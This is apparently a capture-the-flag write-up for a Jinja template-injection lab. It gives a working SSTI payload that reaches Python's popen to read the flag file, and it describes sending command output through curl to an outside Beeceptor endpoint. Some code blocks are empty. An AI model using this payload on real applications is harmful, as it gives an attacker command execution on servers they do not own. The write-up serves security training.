Simple Web 0x15(Lab - Jinja)
tags: NTUSTWS CTF Web
Challenge: http://h4ck3r.quest:8700/
Background
Source code
1 |
|
Exploit
Easy way
payload: {{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']("cat /th1s_15_fl4ggggggg").read()}}

Need Tool way - Beeceptor
Beeceptor will catch our result from curl.
It’ll execute cat /th1s_15_fl4ggggggg first and the result will be sent to Beeceptor as attached data by curl.
Payload:
1 |
|

Flag: FLAG{ssti.__class__.__pwn__}